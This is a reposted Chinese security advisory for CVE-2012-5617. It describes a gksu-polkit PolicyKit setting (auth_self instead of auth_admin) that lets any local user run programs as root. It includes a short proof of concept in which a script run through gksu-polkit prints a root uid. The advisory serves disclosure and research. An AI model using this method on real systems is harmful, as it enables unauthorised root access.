gksu-polkit policykit配置文件身份验证设置权限提升漏洞

Linux大全评论1.3K views阅读模式

发布日期:2012-12-12
更新日期:2012-12-14

受影响系统:
GNOME gksu-polkit
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56918
CVE(CAN) ID: CVE-2012-5617

gksu-polkit是一个库和命令行工具,可以以root权限运行程序。

gksu-polkit所带的PolicyKit配置文件允许用户以管理员权限执行程序,因为默认的allow_active设置是"auth_self",而不是"auth_admin",任何本地用户可利用此漏洞以root权限执行任意程序。

<*来源:Miroslav Trmac
 
  链接:https://launchpad.net/Ubuntu/+source/gksu-polkit
        https://bugzilla.RedHat.com/show_bug.cgi?id=883162
        https://bugzilla.redhat.com/show_bug.cgi?id=886671
        http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=695807
        http://seclists.org/oss-sec/2012/q4/443
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ cat foo.sh
#! /bin/bash
id -a
# not just gksu-polkit id -a because gksu-polkit tries to interpret the -a
# this prompts for user's password only
$ gksu-polkit /home/user/foo.sh
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

建议:
--------------------------------------------------------------------------------
厂商补丁:

企鹅博客
  • 本文由 发表于 2020年9月27日 07:38:00
  • 转载请务必保留本文链接:https://www.qieseo.com/147637.html

发表评论